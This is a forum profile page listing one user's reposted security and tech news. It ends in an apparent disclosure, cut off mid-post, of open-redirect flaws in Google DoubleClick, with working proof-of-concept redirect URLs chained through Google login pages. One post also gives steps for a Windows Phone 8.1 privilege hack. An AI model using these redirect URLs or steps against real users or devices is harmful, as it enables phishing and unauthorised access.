Jump to content

akkiliON

Active Members
  • Posts

    1202
  • Joined

  • Last visited

  • Days Won

    61

Everything posted by akkiliON

  1. Tor has always been a tough target for law enforcement for years and FBI has spent millions of dollars to de-anonymize the identity of Tor users, but a latest research suggests that more than 81% of Tor clients can be "de-anonymised" by exploiting the traffic analysis software ‘Netflow’ technology that Cisco has built into its router protocols. NetFlow is a network protocol designed to collect and monitor network traffic. It exchanged data in network flows, which can correspond to TCP connections or other IP packets sharing common characteristics, such UDP packets sharing source and destination IP addresses, port numbers, and other information. The research was conducted for six years by professor Sambuddho Chakravarty, a former researcher at Columbia University’s Network Security Lab and now researching Network Anonymity and Privacy at the Indraprastha Institute of Information Technology in Delhi. Chakravarty used a technique, in order to determine the Tor relays, which involved a modified public Tor server running on Linux, accessed by the victim client, and modified Tor node that can form one-hop circuits with arbitrary legitimate nodes. According to the research paper, to carry out large-scale traffic analysis attacks in the Tor environment one would not necessarily need the resources of a nation state, even a single AS may observe a large fraction of entry and exit node traffic, as stated in the paper – a single AS (Autonomous System) could monitor more than 39% of randomly-generated Tor circuits. The technique depends on injecting a repeating traffic pattern into the TCP connection that it observes as originating from the target exit node, and then correlating the server’s exit traffic for the Tor clients, as derived from the router’s flow records, to identify Tor client. Tor is vulnerable to this kind of traffic analysis because it is designed as low-latency anonymous communication networks. Chakravarty’s research on traffic analysis doesn't need hundreds of millions of dollars in expense, neither it needed infrastructural efforts that the NSA put into their FoxAcid Tor redirects, however it benefits from running one or more high-bandwidth, high-performance, high-uptime Tor relays. Just few days ago, US and European authorities announced the seizure of 27 different websites as part of a much larger operation called Operation Onymous, which led to take-down of more than "410 hidden domains" that sell illegal goods and services from drugs to murder-for-hire assassins by masking their identities using the Tor encryption network. Surs?: http://thehackernews.com/2014/11/81-of-tor-users-can-be-easily-unmasked_18.html
  2. Do you wanna hack Nokia Lumia phone running the latest mobile operating system Windows 8.1 ?? Hackers have made it very easy for you all..!! Just few weeks after Microsoft announced a 19 year-old critical security hole existed in almost every version of its Windows operating system, XDA-developers have discovered a new vulnerability in Microsoft’s youngest OS Windows 8.1 that could easily be exploited by hackers to hack a Nokia Lumia phone. XDA Developers hacker who go by the name DJAmol has found a wide open hole in OS Windows Phone 8.1 which makes the operating system very easy to hack. The vulnerability allows attackers to run their application with other user's privileges and edit the registry. DJAmol realized that simply by replacing the contents of a trusted OEM app that has been transferred over to the SD card, the app will inherit the privileges of the original app. Once done, an attacker could then delete the existing directory and create a new directory with the same name as the original App. As a result, the third party registry editor app will gain full access to the Info and Settings in the app itself. This how the hack can be implement in a few simple steps prescribed by XDA-developers in a blog post. Develop your own application package and deploy it on the target device. Install an any application such as “Glance Background Beta” from the Window Phone app Store. Delete all folders under the targeted directory of the installed app, in this case, Glance background. Now copy the contents of your own deployed package and paste it on the targeted directory. This implies replacing the “Program Files” of the installed app with your package files. Finally launch the App which will run in OEM (Glance Background beta) directory using the privileges of the targeted App. The hack is very simple and easy to implement because all it need an application from the Window app store. But thankfully, the hack has not yet escalated to a full interop unlock, as the applications which are allowed to be moved to the SD card have limited access. XDA developers forum reported the vulnerability to the Microsoft and also warned them that the vulnerability could give higher privileges to the attackers if tried using a First Party Application, rather a third party app. By the time, we can just wait for a response from Microsoft’s part to prevent it from getting more serious. Surs?: http://thehackernews.com/2014/11/windows-phone-81-hacked.html
  3. Sony ne ofera cateva informatii scurte despre urmatorul senzor foto ce urmeaza sa echipeze noile generatii de telefoane si tablete marca Sony. Acest senzor aduce imbunatatiri majore si va putea fi folosit si de alti producatori de telefoane si tablete din 2015. Senzorul cu numele Exmor RS IMX230 are o dimensiune de 1/2.4 inch, rezolutie de 21 MP si este primul CMOS cu functie HDR. Acest senzor va putea filma 4K cu HDR, integreaza tehnologia Plane Phases Detection Autofocus, pentru a realiza focus mai rapid la obiectele in miscare si are 192 de puncte de autofocus. Este similar cu senzorii regasiti pe aparatele foto Mirrorless, suporta formatul RAW, si va putea fi folosit din aprilie 2015 de catre toti producatorii. Pana atunci, zvonurile spunca acest nou senzor va fi integrat pe Xperia Z4. Surs?: Sony introduce senzor foto CMOS pe smartphone-uri si tablete | Arena IT
  4. THE US GOVERNMENT HACKS reported recently were more serious that at first thought. The attacks, which started at the end of October, were originally believed to have been directed solely at the White House, taking email systems offline and making external internet access spotty. But Nextgov now reports that the State Department's servers were attacked at the same time. Both systems remain under attack which has now led the servers to be suspended while security upgrades take place. It is suspected that Russian, or possibly Chinese, hackers employed by the state are responsible, but the US has played down such concerns, stating that the attacks are on unclassified servers. Neither party has claimed responsibility and no-one from the US government is willing to do more than speculate that this is the cause. "The department recently detected activity of concern in portions of its unclassified email system," said a State Department official. "There was no compromise of any of the department's classified systems." The statement goes on to confirm that security upgrades are taking place during a scheduled outage as a result of the attacks. Since the initial attack, other non-critical government systems, including those of the US post office and US weather service, are said to have been targeted. Systems at the State Department will be restored "soon", which will be a relief to employees who may otherwise discover what we did on Monday mornings before computers. Attacks on US government servers are a daily occurrence, but this attack seems to be the most sustained yet by a state-sanctioned group. Russia and China are viable culprits. Already this year Russian hackers have stolen a billion email addresses, while China announced that it will move to its own operating system by 2020 to negate a perceived threat from the US-based Windows. Surs?: US State Department systems taken offline after more foreign state hacks- The Inquirer
  5. White House Cybersecurity Policy Coordinator Michael Daniel listens to questions during the Reuters Cybersecurity Summit in Washington, May 14, 2013. Jonathan Ernst/Reuters/Corbis For years the government has refused to talk about or even acknowledge its secret use of zero-day software vulnerabilities to hack into the computers of adversaries and criminal suspects. This year, however, the Obama administration finally acknowledged in a roundabout way what everyone already knew—that the National Security Agency and law enforcement agencies sometimes keep information about software vulnerabilities secret so the government can exploit them for purposes of surveillance and sabotage. Government sources told the New York Times last spring that any time the NSA discovers a major flaw in software it has to disclose the vulnerability to the vendor and others so that the security hole can be patched. But they also said that if the hole has “a clear national security or law enforcement” use, the government can choose to keep information about the vulnerability secret in order to exploit it. This begged the question about just how many vulnerabilities the government has withheld over the years to exploit. In a new interview about the government’s zero-day policy, Michael Daniel, National Security Council cybersecurity coordinator and special adviser to the president on cybersecurity issues, insists to WIRED that the government doesn’t stockpile large numbers of zero days for use. “[T]here’s often this image that the government has spent a lot of time and effort to discover vulnerabilities that we’ve stockpiled in huge numbers … The reality is just not nearly as stark or as interesting as that,” he says. Zero-day vulnerabilities are software security holes that are not known to the software vendor and are therefore unpatched and open to attack by hackers and others. A zero-day exploit is the malicious code crafted to attack such a hole to gain entry to a computer. When security researchers uncover zero-day vulnerabilities, they generally disclose them to the vendor so they can be patched. But when the government wants to exploit a hole, it withholds the information, leaving all computers that contain the flaw open to attack—including U.S. government computers, critical infrastructure systems and the computers of average users. Daniel says the government’s retention of zero-days for exploitation is the exception, not the rule, and that the policy for disclosing zero-day vulnerabilities by default—aside from special-use cases—is not new but has been in place since 2010. He won’t say how many zero-days the government has disclosed in the four years since the policy went into effect or how many it may have been withholding and exploiting before the policy was established. But during an appearance at Stanford University earlier this month, Admiral Mike Rogers, who replaced retiring Gen. Keith Alexander as the NSA’s new director last spring, said that “by orders of magnitude, the greatest numbers of vulnerabilities we find, we share.” That statement, however, appears to contradict what a government-appointed review board said last year. So WIRED spoke with Daniel in an effort to get some clarity on this and other questions about the government’s zero-day policy. Timeline of Policy in Question Last December, the President’s Review Group on Intelligence and Communications Technologies seemed to suggest the government had no policy in place for disclosing zero days when it recommended in a public report that only in rare instances should the U.S. government authorize the use of zero-day exploits, and then only for “high priority intelligence collection.” The review board, convened by President Obama in the wake of Edward Snowden’s revelations about the NSA’s surveillance activities, produced its lengthy report (.pdf) to provide recommendations for reforming the intelligence community’s activities. The report made a number of recommendations on various topics, but the one addressing zero-days was notable because it was the first time the government’s use of exploits was acknowledged in such a forum. The review board asserted that “in almost all instances, for widely used code, it is in the national interest to eliminate software vulnerabilities rather than to use them for US intelligence collection.” The board also said that decisions about withholding a vulnerability for purposes of exploitation should only be made “following senior, interagency review involving all appropriate departments.” And when the government does decide to withhold information about a zero-day hole to exploit it, that decision should have an expiration date. Obama appeared to ignore the board’s recommendations when, a month later, he announced a list of NSA reforms that contained no mention of zero days or the government’s policy about using them. It wasn’t until the Heartbleed vulnerability was discovered in April, and a news report falsely claimed the NSA had known about the flaw and kept silent about it to exploit it, that the administration finally went public with a formal statement about its zero-day policy. In addition to comments given to the Times announcing the default disclosure policy, Daniel published a blog post stating that the White House had also “re-invigorated” its process for implementing this “existing policy.” The statements, however, raised more questions than they answered. Was this a new policy or had the government been disclosing vulnerabilities prior to this announcement? What did “reinvigorated” mean? And did the policy apply equally to zero-day vulnerabilities that the government purchased from contractors or just ones that the NSA itself discovered? Daniel says although the default-disclosure policy was established in 2010 it “had not been implemented to the full degree that it should have been,” hence the government’s use of the term “reinvigorated” to describe this new phase. The relevant agencies, he says, “had not been doing sufficient interagency communications and ensuring that everybody had the right level of visibility across the entire government” about vulnerabilities that were discovered. What this means is that although “they probably were disclosing the vulnerability” by default, they “may not have been communicating that to all the relevant agencies as regular as they should have been.” Agencies, he says, might have been communicating “at the subject-matter expert level,” but the communication may not have been happening as consistently, in as coordinated a fashion or within the timelines that the policy dictated. This was the part, he says, that was “reinvigorated” this year “to make sure it was actually happening consistently and as thoroughly as the policy called for.” Daniel didn’t say exactly when in 2010 the policy was initiated or what prompted it, but 2010 is the year the Stuxnet virus/worm was discovered infecting machines in Iran. Stuxnet was a digital weapon reportedly designed by the U.S. and Israel to sabotage centrifuges enriching uranium for Iran’s nuclear program. It used five zero-day exploits to spread, one of which was a fundamental vulnerability in the Windows operating system that affected millions of machines around the world, yet information about the vulnerability was kept secret so the U.S. and Israel could use it to spread Stuxnet on machines in Iran. Asked why, if the policy had been in place since 2010 the review board didn’t seem to know about it when they made their recommendations last December, Daniel says he didn’t know. So WIRED contacted Peter Swire, a member of the review board and a professor of law and ethics at the Georgia institute of Technology, to clarify if the group had been briefed on the existing zero-day policy before they wrote their report. Swire says they had, but parsed his words carefully as he explained that the group’s recommendations to the president stemmed from the fact that the policy wasn’t being implemented as the board thought it should, noting that certain presumptions about the existing policy needed to be clarified and strengthened. “A presumption might mean you take action 55 percent of the time [to disclose a vulnerability] or a presumption might mean we do it 99 percent of the time,” Swire says. “A 99 percent presumption is a much stronger presumption; it means exceptions are much less frequent…. Our recommendation was to have significantly fewer exceptions.” The group also recommended, he says, a shift in the “equities” process—the process used to determine when a vulnerability is withheld and when it is disclosed—from the NSA to the White House, implying that until this year the NSA or the intelligence community had been the sole arbiter of decisions about the use of zero-day vulnerabilities and exploits. The review board had recommended that the National Security Council have an oversight role in this process, and Daniel confirmed to WIRED that his office now oversees the process. So it appears that although Obama didn’t publicly acknowledge the review board’s recommendations when he announced his reforms of the NSA last January, he did in fact implement their two recommendations about the government’s handling of zero days—by strengthening the default presumption for disclosing zero days and giving someone other than the NSA authority over deciding when to disclose or withhold zero days. On how the Interagency Equities Process Works Daniel wouldn’t go into detail about the equities process or who is involved in it other than to say “the agencies that you would expect” use a “multi-factor test” to examine vulnerabilities to determine how extensively the software is used in critical infrastructure and US government systems, and how likely it is that malicious actors have already got ahold of it or may get hold of it. “All of those questions that are laid out, we require that analysis and discuss each one of those points. Then groups of subject-matter experts across the government make a recommendation to this interagency group that I chair here on the National Security Council.” The subject-matter experts provide “their best judgment about it’s widespreadness or how likely it is that researchers are going to be able to discover it or how unlikely it is that a foreign adversary has it.” He reiterated that the government’s default position would be to disclose but that there “are a limited set of vulnerabilities that we may need to retain for a period of time in order to conduct legitimate national security intelligence and law enforcement missions.” He wouldn’t say what the period of time would be for withholding information about vulnerabilities to exploit them before disclosing them but says it “is not one that lasts in perpetuity. In fact the policy actually says that we must regularly review a decision to retain a vulnerability and make sure that all the factors that I mentioned before still hold.” That review, he says, happens several times a year. “So the situation may change and we may decide at that point that it’s time to actually disclose the vulnerability,” he notes. On Stockpiling Vulnerabilities Daniel would not say how many vulnerabilities the government has disclosed or retained so far, but he denied that it maintains a vast repository of zero days. “What we can say is that the overwhelming majority of those that we find we do disclose,” he notes, echoing the words Rogers had used. “The idea that we have these vast stockpiles of vulnerabilities stored up—you know, Raider’s of the Lost Ark style—is just not accurate. So the default position really is that we disclose most of the vulnerabilities that we find to the vendors. We just don’t take credit for it for a variety of reasons and have no desire to take credit for it.” Asked if the disclosure policy also applies to zero-day vulnerabilities and exploits the government purchases from contractors and independent sellers, Daniel says it does. “It’s difficult for me to talk about where we might find the vulnerabilities or the source of the vulnerabilities that the US government comes across because of course a lot of that is classified,” he says. “ut the policy remains that our default position is going to be and our strong bias is going to be that we will disclose vulnerabilities to vendors. If you picked an economy that was digitally dependent, the United States is certainly at the top of the list, right? So it’s highly likely that we are going to face a situation where a vulnerability would be something that we would be concerned about from a network defense standpoint. So it shouldn’t be surprising that our bias is going to be towards disclosing it.” How exactly this would work, however, is unclear. The government doesn’t necessarily own the information and code it purchases from vendors. Not every exploit sold is purchased under an exclusivity agreement. Sellers may also ask the government to sign an NDA related to a sale. Daniel replied that it made perfect sense to purchase some vulnerabilities to disclose if, for example, the government learned that someone was peddling a vulnerability that affected a lot of critical infrastructure networks and the government wanted to take it off the market and get it fixed. “I’m not saying that would be the primary method or even the most desirable method, but it is certainly one that you could contemplate the US government pursuing if we thought the vulnerability was significant enough for us to try to get it patched,” he says. But it’s unclear how the default disclosure process applies when the government is also purchasing vulnerabilities from vendors specifically to exploit them. What would be the point of spending U.S. tax dollars on a vulnerability only to burn it by disclosing it? Daniel sidestepped the question, saying, “[T]here’s often this image that the government has spent a lot of time and effort to discover vulnerabilities that we’ve stockpiled in huge numbers and similarly that we would be purchasing very, very large numbers of vulnerabilities on the open mark, the gray market, the black market, whatever you want to call it. And I think the reality is just not nearly as stark or as interesting as that, and that the numbers are just not anywhere near what people believe they are….” Surs?: U.S. Gov Insists It Doesn't Stockpile Zero-Day Exploits to Hack Enemies | WIRED
  6. Cyber criminals are using new malware variants by exploiting GNU Bash vulnerability referred to as ShellShock (CVE-2014-6271) in order to infect embedded devices running BusyBox software, according to a researcher. A new variant of "Bashlite" malware targeting devices running BusyBox software was spotted by the researchers at Trend Micro shortly after the public disclosure of the ShellShock vulnerability. BusyBox provides set of command line utilities that are specifically designed to run in constrained embedded environments. At compile time, different capabilities can be left out, reducing the size of the binaries, and efforts are made to make them memory efficient. This makes the software an excellent candidate for use in consumer electronics devices, which seem to have been the items of interest in this case. The malware variant, detected as ELF_BASHLITE.A (ELF_FLOODER.W), when executed on victim's machine, scans compromised networks for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords. The variant would then run a command to download and run bin.sh and bin2.sh scripts to gain control over Busybox systems once a connection was established. Therefore, this newer version of Bashlite is designed not only to identify systems running BusyBox, but also to hijack them. Miscreants attempted to log in using a predefined list of usernames which include 'root', 'admin' and 'support' and common and default list of passwords such as 'root,' 'admin,' '12345,' 'pass,' 'password,' '123456' and so on. Trend Micro's Inocencio urged users to change their default usernames and passwords in order to keep them on the safer side, and also to disable remote shells, if possible, to avoid its exploitation. Bashlite malware includes the payload of the ShellShock exploit code and threat actors have used this critical ShellShock Bash command vulnerability (CVE-2014-6271) to build botnets from hijacked devices, launch distributed denial-of-service (DDoS) attacks, and target network attached storage boxes among other exploits. The Critical ShellShock Bash bug was disclosed on September 24 and by September 30 security firms estimated that attacks using the exploit could top 1 billion, and more than 1000 organizations patched the ShellShock bug as fixes became available. Surs?: BASHLITE Malware leverages ShellShock Bug to Hijack Devices Running BusyBox
  7. A?a m? gândeam ?i eu.
  8. The founder the bitcoin ATM firm, Mr Bitcoin, has embedded a tiny chip in his hands to keep his digital currency safe, which also gives him an in-body set of keys and an alarm clock. Dutch entrepreneur Martijn Wismeijer has had an NFC (near-field communication) chip injected into each hand between the muscle and skin tissue. The ultra-cautious Mr Wismeijer says it’s crucial to get the chips encrypted to prevent theft, although actually stealing the chips would be tricky, bloody and painful for their owner. Each chip, manufactured from glass, is 2mm x 12mm, and can hold up to 888 bites of programmable memory, the equivalent of about 26 condensed bitcoin private keys. “I did it because I wanted to experiment with strong bitcoins using subdermal implants because that’s what I thought would be the Holy Grail of contactless payments,” he told the IBTimes. But Mr Wismeijer found that the microchips could be used for a number of other things and can be read by smartphones like the Apple iPhone 6 and the Samsung Galaxy S5. “I found you can use them for lots of different things, even as an alarm snooze button. To switch off my alarm I need to scan either one or two of the implants, so this way it takes a little bit of fiddling so you never oversleep again,” he said. Wismeijer also hopes to get a special door lock fitted to his house, which will allow him to do away with keys by touching his palm on the door frame to enter. “I thought that if the storage is limited then there's no point in just getting one if I could have two, because with one I could store private information like cryptocurrency or two-factor authentication for passwords, while the other one I could use for public things like my emergency contacts or my business card," he said. No pain no gain Wismeijer does not recommend people try and install it in their bodies themselves. “Most doctors will not want to install the implant so a body manipulation artist (preferably not just a tattoo artist or piercer) will be your next best bet, but make sure they work according to strict hygiene codes and know what they are doing,” he told the Telegraph. The pain lasts only for a day he said. When asked, mainly be older people, why he bothers to go to such lengths, Wismeijer says it’s all in the name of progress. He hopes that in the not too distant future we will be able to have more complex chips fitted into our bodies that will be able to monitor things like heart rate and glucose levels. Surs?: http://rt.com/news/204315-implant-bitcoin-wallet-skin/
  9. The U.S. government is reportedly using spy airplanes equipped with special military-grade snooping equipment to eavesdrop on cell phone information from millions of smartphone users in U.S, according to a new report. This little device, nicknamed "Dirtbox", is being used to mimic mobile phone tower transmissions from the sky and gather data from millions of mobile phones, helping the US Marshals Service track criminals while recording innocent citizens’ information. The purpose of the device is supposedly to track a specific target, but if active, all mobile devices in the particular area will respond to the signal. The Dirtbox causes smartphones to transmit back the users’ location, registration information and identity data – uniquely identifying IMEI numbers stored in every mobile device, The Wall Street Journal reported. The name Dirtbox is given after the initials of Digital Receiver Technology, Inc. (DRT), a Boeing Company subsidiary that allegedly manufactures these devices. These two-foot-square snooping devices imitate cellphone towers and thus make contact with all handsets in the range. The operation began in 2007 and according to the WSJ, a "source familiar with the program" said that these devices are fitted onto Cessna aircraft and fly from at least five metropolitan airports in the US. The planes cover the majority of the US population. The dirtboxes operate in the same way as the so-called mobile phone surveillance tool IMSI (International mobile subscriber identity) catchers or Stingrays, that is in use by over 46 agencies including the law enforcement, the military, and intelligence agencies across 18 states and Washington, D.C. for more than a decade. StingRays are common surveillance devices that allow law enforcement to mimic a cell phone tower, and track users position who connect to it, and sometimes even intercept calls and Internet traffic, send fake texts, install spyware on a phone, and determine precise locations. Both Stingrays and Dirtboxes make use of "off-the-shelf" components to gather mobile phones’ International Mobile Subscriber Identity (IMSI) which is a unique code to each device. They can be used to track individuals’ movements via their mobile phone devices but work indiscriminately, hovering up information from a general area. The US Department of Justice – which oversees the marshal service – has neither confirmed nor denied the existence of the Dirtbox program, but anonymous sources familiar with their use said the flying spies-in-the-sky were technically above board. The WSJ quotes one source as stating, "What is done on US soil is completely legal….., Whether it should be done is a separate question." Surs?: http://thehackernews.com/2014/11/spy-planes-equipped-with-dirtbox.html
  10. The bugs in the payment system could let attackers get at the contents of a phone Several bugs in Near Field Communication (NFC) payment systems have been found by security experts. NFC allows people to pay for goods and services by touching their handset to a payment terminal. But the inclusion of the technology on phones has proved useful to hackers seeking a stealthy way to take over a mobile phone. In most cases the bugs would give an attacker complete access to a device's data. The security experts demonstrated the weaknesses in NFC technology at an event in Tokyo organised by Hewlett Packard. Called Mobile Pwn2Own the competition involves researchers and developers using bugs in an attempt to subvert a series of handsets. A prize pool of $425,000 (£271,000) was available to those who managed to get access to a handset's innards via a bug they had found. Entrants would get a slice of that cash by taking less than 30 minutes to carry out a successful attack via a previously unknown vulnerability. Eight separate devices, including an Apple iPhone, Blackberry Z30, Amazon Fire phone and Google Nexus 7, were the targets for the security experts. On the first day of the two-day competition five teams successfully used the bugs they had found to take over five devices. Three of the successes exploited NFC to give the attackers the ability to extract data at will from the phones. The other two attacks compromised a phone via its on-board web browser. UK security expert Adam Laurie, Japan's Team MBSD and South Africa's MWR InfoSecurity were among the prize winners. The Apple iPhone 5S, Samsung Galaxy 5, LG Nexus 5 and Amazon Fire Phone were all successfully compromised. Details of the vulnerabilities have now been shared with the makers of the handsets so that the bugs can be patched and fixed. Surs?: BBC News - Hackers exploit NFC phone payment technology
  11. Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers Although Google does not include Open Redirect vulnerabilities in its bug bounty program, its preventive measures against Open Redirect attacks have been quite thorough and effective to date. However, Google might have overlooked the security of its DoubleClick.net <http://doubleclick.net/> ?advertising system. After some test, it is found that most of the redirection URLs within DoubleClick.net <http://doubleclick.net/> are vulnerable to Open Redirect vulnerabilities. Many redirection are likely to be affected. These redirections can be easily used by spammers, too. Some URLs belong to Googleads.g.Doubleclick.net <http://googleads.g.doubleclick.net/> are vulnerable to Open Redirect attacks, too. While Google prevents similar URL redirections other than Googleads.g.Doubleclick.net <http://googleads.g.doubleclick.net/>. Attackers can use URLs related to Google Account to make the attacks more powerful. Moreover, these vulnerabilities can be used to attack other companies such as Google, eBay, The New York Times, e.g. by bypassing their Open Redirect filters(Covert Redirect). *(1) Background Related to Google DoubleClick.net.* *(1.1) What is DoubleClick.net?* "DoubleClick is the ad technology foundation to create, transact, and manage digital advertising for the world's buyers, creators and sellers." http://www.google.com.sg/doubleclick/ *(1.2) Reports Related to Google DoubleClick.net Used by Spammers* *(1.2.1)* Google DoublClick.net has been used by spammers for long time. The following is a report in 2008. "The open redirect had become popular with spammers trying to lure users into clicking their links, as they could be made to look like safe URLs within Google's domain." https://www.virusbtn.com/blog/2008/06_03a.xml?comments *(1.2.2)* Mitechmate published a blog related to DoubleClick.net spams in 2014. "Ad.doubleclick.net <http://ad.doubleclick.net/> is recognized as a perilous adware application that causes unwanted redirections when surfing on the certain webpages. Actually it is another browser hijacker that aims to distribute frauds to make money.Commonly people pick up Ad.doubleclick virus when download softwares, browse porn site or read spam email attachments. It enters into computer sneakily after using computer insecurely.Ad.doubleclick.net <http://insecurely.ad.doubleclick.net/> is not just annoying, this malware traces users’ personal information, which would be utilized for cyber criminal." http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/ *(1.2.3)* Malwarebytes posted a news related to DoubleClick.net malvertising in 2014. "Large malvertising campaign under way involving DoubleClick and Zedo" https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/ *(2) DoubleClick.net System URL Redirection Vulnerabilities Details.* These vulnerabilities can be attacked without user login. Tests were performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7. Used webpages for the following tests. The webpage address is " http://www.tetraph.com/security". We can suppose that this webpage is malicious. *(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net <http://googleads.g.doubleclick.net/>.* *(2.1.1)* Some URLs belong to googleads.g.doubleclick.net are vulnerable to Open Redirect attacks. While Google prevents similar URL redirection other than googleads.g.doubleclick.net. Vulnerable URLs: http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.sharp-world.com/igzo http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://economics.wj.com POC: http://googleads.g.doubleclick.net/aclk?sa=L&ai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYV&num=0&sig=AOD64_2petJH0A9Zjj45GN117ocBukiroA&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security http://googleads.g.doubleclick.net/aclk?sa=L&ai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYV&num=0&sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQ&client=ca-pub-0466582109566532&adurl=http://www.tetraph.com/security Attackers can make use of the following URLs to make the attacks more powerful, i.e. https://www.google.com/accounts/ServiceLogin?continue=https%3A%2F%2Fsites.google.com%2Fsite%2Fissrabhi%2Fhome&service=jotspot&passive=true&ul=1 https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fwww.orkut.com%2FRedirLogin%3Fmsg%3D1%26auth%3D* POC: https://www.google.com/accounts/ServiceLogin?continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.tetraph.com%2Fessaybeans%2Freflections%2Fsolitude.html https://accounts.google.com/accounts/SetSID?ssdc=1&sidt=*&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_____wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.diebiyi.com%2Farticles *(2.1.2)* While Google prevents similar URL redirection other than googleads.g.doubleclick.net , e.g. http://www.googleadservices.com/pagead/aclk?sa=L&ai=C8u9OibgEU_XIOKrNswfrzYDgAY2FhfgE1aLjnoYB-7qSCxADILhPKANQrt2khP3_____AWC_BaAB8-vV0gPIAQGqBChP0AshNp656okgv3tSxmgc3JZeuS25cM0HlW9wUqHwxL8nk75mFPqsgAf1k6otkAcB&num=3&val=ChA2MWI5ODZkYzA4MTlmZmRlEN-mlZgFGgghk-txLb-9bSABKAAwhPDs-dD_xPHhATj6w5KYBUD6w5KYBQ&sig=AOD64_2f3wWGlepm4KMYlixE15qmjC1FGw&adurl=http://freshservice.com/free-service-desk/ 